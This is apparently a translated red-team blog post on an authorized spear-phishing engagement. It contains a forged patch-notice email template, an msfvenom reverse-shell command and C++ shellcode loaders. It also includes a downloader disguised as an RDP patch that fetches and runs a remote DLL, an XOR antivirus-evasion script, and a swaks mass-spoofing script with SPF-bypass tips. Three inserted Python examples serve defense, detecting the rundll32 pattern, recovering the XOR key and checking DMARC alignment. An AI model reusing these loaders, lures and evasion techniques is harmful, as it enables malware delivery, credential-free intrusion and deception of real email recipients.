Trying "spear phishing": one of the attack methods hackers use. The most common approach is to attach a trojan program to an email and give it a highly enticing name.
2024-12-07
<p>This was an authorized spear-phishing case, and it was all trial and testing; my experience here is not very deep.</p>
0x01 Spear Phishing
<p>"Spear phishing" is one of the attack methods hackers use. The most common approach is to attach a trojan program to an email, give it a highly enticing name, and send it to the target machine, luring the victim into opening the attachment and thereby getting infected with the trojan.</p>
0x02 Getting Started
<p>I could not get a shell for the time being, so I started with spear phishing, hoping to get some results.</p>
<p>I asked whether this kind of technical approach was permitted:</p>
<p align="center"><img alt="2019-05-21-17-31-30" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed575972f0ca~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>Then I asked a colleague for material: an email from the client, which contained the email signature, department name, and logo.</p>
0x03 Building the Template
<p align="center"><img alt="2019-05-21-17-36-21" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed575fb6da2b~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>The rough content was:</p>
<p>Subject: Shanghai XXX urgent security hardening notice for business-network and office-network endpoints</p>
<p>Background</p>
<p>On 15 May 2019 (Beijing time), Microsoft released a security patch fixing CVE-2019-0708, a remote code execution vulnerability in Windows Remote Desktop Services (RDP). The vulnerability can be triggered remotely without any authentication, and both its severity and its scope of impact are extremely large.</p>
<p>Affected versions</p>
<p>Windows 7</p>
<p>Windows Server 2008 R2</p>
<p>Windows Server 2008</p>
<p>Windows Server 2003</p>
<p>Windows XP</p>
<p>Because this vulnerability is as dangerous as last year's "WannaCry" ransomware, the Head Office Information Technology Department has decided to roll out the vulnerability hardening patch first, to ensure the vulnerability is fully patched on both the business network and the office network.</p>
<p>Installation</p>
<p>Extract "上海XXXRDP漏洞补丁.zip" ("Shanghai XXX RDP vulnerability patch.zip"; extraction password: XXX123). Once extracted, double-click "RDP-VulnPatch.exe" to run it:</p>
<p>On success it displays "Vulnerability fixed successfully!"</p>
<p>Shanghai XXX</p>
<p>20 May 2019</p>
<p>The extraction password is also a weak password commonly seen at the target.</p>
0x04 Building the Trojan
<p>I hand-built a windows/shell/reverse_tcp trojan DLL, first obtaining the shellcode generated by msfvenom:</p>
<pre><code>$ /opt/metasploit-framework/bin/msfvenom -p windows/shell/reverse_tcp LHOST=xxxx LPORT=8899 -f c -e x86/shikata_ga_nai -i 20</code></pre>
<p align="center"><img alt="2019-05-21-17-39-23" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57527a7578~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>Using the earlier QQ Pinyin input method DLL hijacking vulnerability, I did a "white" load, i.e. loading through the trusted, signed QQ binary.</p>
<pre><code>VOID shdjshjdhsjhdjshdjs() {
    unsigned char buff[] =
        "\xbe\x65\x43\x60\x4a\xdb\xcd\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
        "\xd6\x31\....part omitted.......7\xe7\xc3\x2a\xcd\x23\xb8\x07\x0b\x04\x54\x17"
        "\xc1\x57\x63\x4c\x60\xa7\x7a\xa7\x54\xe7\xc2";
    PVOID p = NULL;
    if ((p = VirtualAlloc(NULL, sizeof(buff), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE)) == NULL) {
        printf("error");
    }
    if (!(CopyMemory(p, buff, sizeof(buff)))) {
        printf("error");
    }
    CODE code = (CODE)p;
    code();
}</code></pre>
<p>Reference article: payloads.online/archivers/2…</p>
0x05 Collecting Mailboxes
<p>Searched Baidu Wenku and found some:</p>
<p>Not pasting the screenshot; redacting it is a hassle...</p>
<p>I wrote a bash script to send the forged emails:</p>
<pre><code>for line in `cat mail`
do
    echo "$line"
    sed "s/xx@xx.net/${line}/g" data.eml | swaks --to $line --from xx@smtp2go.com --h-From '=?UTF-8?B?xx?= &lt;xx@xx.xx.com>' --server mail.smtp2go.com -p 2525 -au USER -ap PASS --data - > /tmp/send.log
done</code></pre>
<p>data.eml is the converted email body.</p>
<p align="center"><img alt="2019-05-21-17-42-16" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5760030493~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>This technique can get past SPF and DKIM checks.</p>
<p align="center"><img alt="2019-05-21-17-42-37" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed575e933a57~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>Details: payloads.online/archivers/2…</p>
<p>Since this was a reverse cmd shell for testing, 360 does not block it.</p>
<p align="center"><img alt="2019-05-21-17-43-02" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed575f1c3c16~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>The email looks like this:</p>
<p align="center"><img alt="2019-05-21-17-44-03" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed579ba67705~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
0x06 A Little Harvest
<p align="center"><img alt="2019-05-21-17-44-37" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed579cec192c~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>After confirmation, it was not the client's machine.</p>
0x07 Second Version
<p>Because the previous version used the QQ input method's signed loader, hovering the mouse over it showed the program's description, which was not the effect I wanted, so I started hand-rolling a trojan....</p>
<p>Development environment:</p>
<p>Windows 10 x64</p>
<p>Visual Studio 2015</p>
<p>Test environment:</p>
<p>Windows 7 x64</p>
<p>360 Safeguard</p>
0x08 Trojan Design
<p>Write a downloader that poses as the vulnerability patch program; the downloader then fetches a DLL module from the server and loads and runs it with rundll32.</p>
<p>Along the way this involved polishing the window prompts, polishing the program's resource information, and requesting privileges.</p>
<p>The result:</p>
<p align="center"><img alt="2019-05-21-17-46-35" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed579d476060~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>Downloader code:</p>
<pre><code>// Win32Project5.cpp : defines the entry point for the console application.
//
#include "stdafx.h"
#include &lt;Windows.h>
#include &lt;iostream>
#include &lt;UrlMon.h>
#pragma comment(lib, "urlmon.lib")
using namespace std;
HRESULT DownloadFile(PTCHAR URL, PTCHAR File);
static TCHAR URL[] = TEXT("ht://**.**.**.**:8000/fff.jpeg");
static TCHAR SaveFile[MAX_PATH];
static TCHAR FileName[] = TEXT("\\fff.dll");
// Download a file
HRESULT DownloadFile(PTCHAR URL, PTCHAR File) {
    HRESULT hr = URLDownloadToFile(0, URL, File, 0, NULL);
    return hr;
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, int iCmdShow)
{
    ZeroMemory(SaveFile, MAX_PATH);
    GetEnvironmentVariable(TEXT("TMP"), SaveFile, MAX_PATH);
    lstrcatW(SaveFile, FileName);
    if (DownloadFile(URL, SaveFile) != S_OK)
    {
        // wprintf(TEXT("Error: %d \n"), GetLastError());
        MessageBox(NULL, TEXT("修复漏洞失败,请检查网络,是否能够连接到微软服务器!"), TEXT("上海XXX"), MB_ICONWARNING | MB_OK);
        return 0;
    }
    lstrcatW(SaveFile, TEXT(",rundll32dllfun"));
    TCHAR opt[MAX_PATH];
    ZeroMemory(opt, MAX_PATH);
    lstrcatW(opt, TEXT(" "));
    lstrcatW(opt, SaveFile);
    PROCESS_INFORMATION pi;
    STARTUPINFO si = { sizeof(si) };
    si.cb = sizeof(si);
    si.wShowWindow = TRUE;
    CreateProcess(
        TEXT("C:\\Windows\\System32\\rundll32.exe"),
        opt,
        NULL,
        NULL,
        FALSE,
        CREATE_NEW_CONSOLE,
        NULL,
        NULL,
        &amp;si,
        &amp;pi);
    cout &lt;&lt; GetLastError() &lt;&lt; endl;
    MessageBox(NULL, TEXT("修复漏洞成功!"), TEXT("上海XXX"), MB_OK | MB_ICONINFORMATION);
    return 0;
}</code></pre>
<p>Code of fff.jpeg:</p>
<pre><code>// Win32Project6.cpp : defines the exported functions for the DLL application.
//
#include "stdafx.h"
#include "Win32Project6.h"
typedef void(_stdcall *CODE)();
// This is an example of an exported variable
WIN32PROJECT6_API int nWin32Project6=0;
extern "C" _declspec(dllexport) void __cdecl rundll32dllfun(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine,int nCmdShow)
{
    unsigned char buf[] =
        "\xbf\xaa\x57\x39\xb0\xda\xdd\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
        "\xd6\x83\xe8\xfc\x31\x78\x10\x03\x78\x10\x48\xa2\x81\x35\xa2"
        "\x82\x9c\xef\x7f\xc5\x15\x34\x8b\xad\xe6\xfd\xc2\x9d\x38\xbd"
        "\x31\x21\x78\x54\xba\xce\x82\xb4\xcc\xe5\x68\x8e\x22\x28\xd7"
        "\x06\x8c\x96\x0a\x7b\xed\x44\xf0\x94\x65\x0e\xa4\x3b\x2e\xcb"
        "\xe7\x17\x60\xaf\x1d\xa4\x57\x1f\xb1\xf3\x01\x31\x5c\x6a\x97"
        "\xf...omitted...";
    PVOID p = NULL;
    p = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (p != NULL)
    {
        memcpy(p, buf, sizeof(buf));
        CODE code = (CODE)p;
        code();
    }
    return;
}</code></pre>
<p>Here, extern "C" _declspec(dllexport) void __cdecl rundll32dllfun is the fixed function definition format that rundll32 expects when loading.</p>
<p>When the trojan runs, it creates rundll32.exe in the process list, which is a system file.</p>
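Because the downloader above starts rundll32.exe through lpApplicationName and hands it a bare DLL path under %TMP% with a custom export, the resulting process-creation event has a recognisable shape that a defender can alert on. The following Python is an added example, not code from the post: it flags such events in constructed Sysmon-style records (the user name, paths, and the `update.jpeg` case are assumptions).

```python
import re

# Constructed process-creation records in Sysmon Event ID 1 style; not real telemetry.
# The first mirrors the loader above: the logged command line is just " <TMP>\fff.dll,rundll32dllfun".
EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r" C:\Users\bob\AppData\Local\Temp\fff.dll,rundll32dllfun",
     "ParentImage": r"C:\Users\bob\Downloads\RDP-VulnPatch.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\bob\Downloads\update.jpeg",Start',
     "ParentImage": r"C:\Program Files\Foo\foo.exe"},
]

RUNDLL32_TOKEN = re.compile(r'^\s*"?[^"\s]*rundll32\.exe"?(?:\s+|$)', re.I)
USER_WRITABLE = re.compile(r"\\(Users|Temp|ProgramData|AppData|Downloads)\\", re.I)
SYSTEM_DIRS = re.compile(r"^C:\\(Windows|Program Files)", re.I)

def parse_rundll32_target(cmdline):
    """Return (dll, export) from a rundll32 command line, or None if no DLL is named.

    rundll32 expects `<dll>[,<export>] [args]`; the DLL may be quoted, and the
    program token is absent when the caller passed it via lpApplicationName."""
    rest = RUNDLL32_TOKEN.sub("", cmdline.strip(), count=1)
    m = re.match(r'"([^"]+)"(?:,(\S+))?|([^,\s]+)(?:,(\S+))?', rest)
    if not m:
        return None
    return (m.group(1) or m.group(3)), (m.group(2) or m.group(4) or "")

def suspicious_rundll32(event):
    """List review reasons for one process-creation event (empty list = nothing flagged)."""
    if not event["Image"].lower().endswith("\\rundll32.exe"):
        return []
    parsed = parse_rundll32_target(event["CommandLine"])
    if parsed is None:
        return ["rundll32 started without a DLL argument"]
    dll, _export = parsed
    reasons = []
    if not RUNDLL32_TOKEN.match(event["CommandLine"]):
        reasons.append("command line omits the program token (lpApplicationName used)")
    if USER_WRITABLE.search(dll):
        reasons.append("DLL in user-writable location: " + dll)
    if not dll.lower().endswith(".dll"):
        reasons.append("DLL with non-.dll extension: " + dll)
    if not SYSTEM_DIRS.match(event["ParentImage"]):
        reasons.append("parent outside system directories: " + event["ParentImage"])
    return reasons
```

Running `suspicious_rundll32` over `EVENTS` flags the first record on three counts, leaves the Control Panel invocation alone, and flags the renamed-extension case twice.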
UAC
<p>To let the trojan obtain higher privileges, I enabled the administrator privilege request:</p>
<p align="center"><img alt="2019-05-21-17-48-31" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed579d88283c~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>Click Yes:</p>
<p align="center"><img alt="2019-05-21-17-49-27" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed579ff51584~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>It reports that the fix succeeded, and then the program closes.</p>
<p>At the same time, a DLL file is created on the local machine:</p>
<p align="center"><img alt="2019-05-21-17-49-46" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57a7ab10af~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p align="center"><img alt="2019-05-21-17-50-20" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57e3b76795~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>An extra rundll32 also shows up among the processes, and 360 does not block it:</p>
<p align="center"><img alt="2019-05-21-17-50-39" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57e7b39fef~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>The server that hosts the download gets extra log entries:</p>
<p align="center"><img alt="2019-05-21-17-50-55" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57e4f6babb~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
0x09 Sending Emails
<p>Over 200 email addresses were collected, and I also wrote a script:</p>
<p align="center"><img alt="2019-05-21-17-52-52" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57fb8642d4~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>It will probably run all night; I'll look at the results tomorrow, and if there are any, keep writing.</p>
0x10 Upgrading the Trojan
<p>The first version was a failure. More attention should be paid to visual cues such as the icon and logo, to suggest that the file is trustworthy; and to achieve AV evasion it should not use another program as the loader. If the second-version trojan had been sent as the first, I reckon the success rate would have been 80%.</p>
<p>But I felt that just using a reverse cmd shell was too crude; the trojan should look the part.</p>
<p>So I started reworking the trojan. The downloader file stays unchanged; only fff.jpeg, the DLL on the server, needs updating, because every run downloads that DLL and then invokes it with rundll32.</p>
<p>I wanted it to check in to Cobalt Strike; getting past Windows Defender was basically no problem anymore. This keeps the trojan already sent by email usable while guaranteeing that the code can be updated.</p>
<p>Just rewrite rundll32dllfun:</p>
<p>fff.jpeg:</p>
<pre><code>extern "C" _declspec(dllexport) void __cdecl rundll32dllfun(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine,
    int nCmdShow)
{
    CHAR cpu_code[] =
        "\xf5\xe1\x80\x09\x09\x09\x69\x80\xec\x38\xdb\x6d\x82\x5b\x39\x82\x5b\x05\x82\x5b\x1d\x82\x7b\x21...part omitted....\x3e\x38\x27\x38\x30\x27\x38\x3d\x3d\x27\x3f\x30\x09\x09\x09\x09\x09";
    DWORD dwCodeLength = sizeof(cpu_code);
    DWORD dwOldProtect = NULL;
    for (DWORD i = 0; i &lt; dwCodeLength; i++) {
        cpu_code[i] ^= 9;
    }
    PVOID pCodeSpace = VirtualAlloc(NULL, dwCodeLength, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pCodeSpace != NULL)
    {
        CopyMemory(pCodeSpace, cpu_code, dwCodeLength);
        Sleep(200);
        VirtualProtect(pCodeSpace, dwCodeLength, PAGE_EXECUTE, &amp;dwOldProtect);
        CODE coder = (CODE)pCodeSpace;
        HANDLE hThread = CreateThread(NULL, 0, (PTHREAD_START_ROUTINE)coder, NULL, 0, NULL);
        WaitForSingleObject(hThread, INFINITE);
    }
    return;
}</code></pre>
<p>Here the shellcode is XOR-decoded, the virtual memory page protection is adjusted, and a thread is created to execute the shellcode, which gets past 90% of AV products..</p>
<p>The benefit of creating a thread is that WaitForSingleObject can be called so that the process only exits after the shellcode has finished executing.</p>
<p>Several times while debugging, the process finished before the shellcode had even run; using WaitForSingleObject solved that problem~</p>
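The XOR loop above also means an analyst can recover the embedded payload without running the DLL: a single-byte key leaves the decoded payload's first bytes recognisable once the right key is tried. The following Python is an added example, not code from the post; it parses the visible prefix of cpu_code[] into bytes, brute-forces the key against the decoded prologue of the common Metasploit/Cobalt Strike x86 stager (a wildcard pattern assumed here), and also handles a prologue that starts after a short prefix.

```python
import re

# The visible prefix of cpu_code[] from the DLL above (the page elides the rest),
# kept as a C string literal and parsed to bytes below.
CPU_CODE_LITERAL = r'"\xf5\xe1\x80\x09\x09\x09\x69\x80\xec\x38\xdb\x6d\x82\x5b\x39\x82\x5b\x05\x82\x5b\x1d\x82\x7b\x21"'

# Decoded prologue of the usual Metasploit/Cobalt Strike x86 stager ("block_api"):
# cld; call <api_block>; pushad; mov ebp,esp; xor edx,edx; mov edx,fs:[edx+0x30].
# None is a wildcard (the call displacement differs between payload builds).
SIGNATURES = {
    "x86 block_api prologue": [0xFC, 0xE8, None, 0x00, 0x00, 0x00, 0x60, 0x89, 0xE5,
                               0x31, 0xD2, 0x64, 0x8B, 0x52, 0x30],
}

def c_literal_to_bytes(text):
    """Collect every \\xHH escape of a C string literal into bytes; other text is ignored."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", text))

def xor_single(data, key):
    """Apply or undo a single-byte XOR, the scheme the `cpu_code[i] ^= 9` loop uses."""
    return bytes(b ^ key for b in data)

def matches(decoded, pattern, offset=0):
    """True if `pattern` (with None wildcards) occurs in `decoded` at `offset`."""
    if len(decoded) < offset + len(pattern):
        return False
    return all(p is None or decoded[offset + i] == p for i, p in enumerate(pattern))

def recover_xor_key(encoded, max_offset=0):
    """Brute-force the single-byte XOR key by looking for a known stager prologue.

    Returns (key, signature_name, offset) for the first hit, or None. max_offset
    lets the prologue start after a short prefix such as a length field."""
    for key in range(256):
        decoded = xor_single(encoded, key)
        for name, pattern in SIGNATURES.items():
            for off in range(max_offset + 1):
                if matches(decoded, pattern, off):
                    return key, name, off
    return None

ENCODED_PREFIX = c_literal_to_bytes(CPU_CODE_LITERAL)

if __name__ == "__main__":
    hit = recover_xor_key(ENCODED_PREFIX)
    print(hit, xor_single(ENCODED_PREFIX, hit[0]).hex() if hit else "no match")
```

On the page's own bytes this recovers key 9 and the decoded prefix `fc e8 89 00 00 00 60 89 e5 ...`, matching the `^= 9` in the loader.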
<p>For this I also wrote an XOR script:</p>
<pre><code>import sys
from argparse import ArgumentParser, FileType
def process_bin(num, src_fp, dst_fp):
    # Python 2 semantics: read(1) returns a one-character str, and '' at EOF
    shellcode = ''
    shellcode_size = 0
    try:
        while True:
            code = src_fp.read(1)
            if code == '':
                break
            base10 = ord(code) ^ num
            code_hex = hex(base10)
            code_hex = code_hex.replace('0x','')
            if(len(code_hex) == 1):
                code_hex = '0' + code_hex
            shellcode += '\\x' + code_hex
            shellcode_size += 1
        src_fp.close()
        dst_fp.write(shellcode)
        dst_fp.close()
        return shellcode_size
    except Exception as e:
        sys.stderr.writelines(str(e))
def main():
    parser = ArgumentParser(prog='Shellcode X', description='[XOR The Cobaltstrike PAYLOAD.BINs] \t > Author: rvn0xsy@gmail.com')
    parser.add_argument('-v','--version',nargs='?')
    parser.add_argument('-s','--src',help=u'source bin file',type=FileType('rb'), required=True)
    parser.add_argument('-d','--dst',help=u'destination shellcode file',type=FileType('w+'),required=True)
    parser.add_argument('-n','--num',help=u'Confused number',type=int, default=90)
    args = parser.parse_args()
    shellcode_size = process_bin(args.num, args.src, args.dst)
    sys.stdout.writelines("[+]Shellcode Size : {} \n".format(shellcode_size))
if __name__ == "__main__":
    main()</code></pre>
<p>Generate a payload.bin:</p>
<p align="center"><img alt="2019-05-21-17-58-59" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed57fc71d1cc~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>Choose raw:</p>
<p align="center"><img alt="2019-05-21-17-59-16" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed580eb54a05~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>In use:</p>
<p align="center"><img alt="2019-05-21-17-59-41" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5810ff7b95~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>The generated shellcode file can be dropped straight into the source code and compiled.</p>
<p>A score of 2/70:</p>
<p align="center"><img alt="2019-05-21-18-00-52" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5817796fea~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>ThreatBook (微步在线):</p>
<p>s.threatbook.com/report/file…</p>
<p>A score of 0/25, not a single detection:</p>
<p align="center"><img alt="2019-05-21-18-12-36" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5817796fea~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>After updating fff.jpeg, all I needed to do was wait in Cobalt Strike for newly checked-in machines...</p>
<p>Just keep sending..</p>
0x11 Cobalt Strike Spear Phish
<p>Cobalt Strike already has the ability to forge emails, so there is no need to memorize swaks commands anymore.</p>
<p>Reference: cobaltstrike.com/help-spear-…</p>
<p align="center"><img alt="2019-05-22-13-04-51" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5824307316~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>To make smtp2go get past the SPF check, fill in xx@smtp2go.com under "Bounce to".</p>
<p align="center"><img alt="2019-05-22-13-09-16" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5834c6bf6a~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p align="center"><img alt="2019-05-22-13-06-37" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5837f073ce~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
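The relay trick used in 0x05 and again here passes SPF only for the envelope (MAIL FROM / "Bounce to") domain that the relay account controls; what catches it on the receiving side is DMARC identifier alignment, which compares that domain with the header From the reader sees. The following Python is an added example, not part of the original post: it evaluates alignment on constructed headers (relay domain smtp2go.com, spoofed From at xx.xx.com), using a simplified two-label organizational-domain cut in place of the Public Suffix List.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed headers modelled on the swaks / "Bounce to" setup above (not a real capture):
# the envelope sender lives at the relay's domain, the header From at the impersonated one.
SPOOFED = """Return-Path: <xx@smtp2go.com>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=xx@smtp2go.com
From: =?UTF-8?B?U2hhbmdoYWkgWFhY?= <xx@xx.xx.com>
To: staff@xx.xx.com
Subject: Urgent RDP hardening notice

(body)
"""

def org_domain(domain, labels=2):
    """Crude organizational-domain cut; real DMARC evaluators use the Public Suffix List."""
    parts = domain.lower().strip(".").split(".")
    return ".".join(parts[-labels:])

def spf_alignment(raw, mode="relaxed"):
    """DMARC-style verdict on one message's SPF identifier alignment.

    SPF authenticates only the RFC5321.MailFrom (envelope) domain, which any relay
    account controls; DMARC additionally requires that domain to align with the
    RFC5322.From header. "relaxed" compares organizational domains, "strict" exact.
    """
    msg = message_from_string(raw)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    auth = msg.get("Authentication-Results", "")
    m = re.search(r"spf=(\w+)\s+smtp\.mailfrom=(?:[^@\s]+@)?([\w.-]+)", auth)
    spf_result, spf_domain = (m.group(1), m.group(2).lower()) if m else ("none", "")
    if mode == "strict":
        aligned = spf_domain == from_domain
    else:
        aligned = org_domain(spf_domain) == org_domain(from_domain)
    return {
        "spf_result": spf_result,
        "spf_domain": spf_domain,
        "from_domain": from_domain,
        "aligned": aligned,
        "dmarc_spf_pass": spf_result == "pass" and aligned,
    }

if __name__ == "__main__":
    print(spf_alignment(SPOOFED))
```

For the constructed message SPF itself passes, but the envelope domain smtp2go.com does not align with xx.xx.com, so the DMARC SPF leg fails and a published p=reject or p=quarantine policy at the impersonated domain would apply.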
<p>These past two days my samples have been getting analyzed like crazy by sandboxes:</p>
<p align="center"><img alt="2019-05-22-13-07-15" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed5845a67f9e~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>
<p>That's normal, though...</p>
0x12 Summary
<p>Actually, for phishing:</p>
<p>Collect more information</p>
<p>Put more target-related information in the attachment to lower psychological defenses</p>
<p>Put yourself in the target's shoes and it all becomes clear</p>
<p>Add more psychological cues (trojan icon, program description, UAC?)</p>
<p>You can cast a wide net</p>
<p>The trojan must be reliable</p>
<p>"White" loading through a trusted signed binary seems suited only to maintaining access</p>
<p>With so many scammers online, and so much anti-fraud education, why does someone always take the bait? If none in 100 do, one in 10,000 will.</p>
<p>An application with the UAC attribute attached shows a shield on it, and some users mistake that for a sign that it is safe.</p>
<p align="center"><img alt="2019-05-21-18-08-07" src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/1/16b0ed583fc7dcfa~tplv-t2oaga2asx-jj-mark:3024:0:0:0:q75.png" loading="lazy"></p>

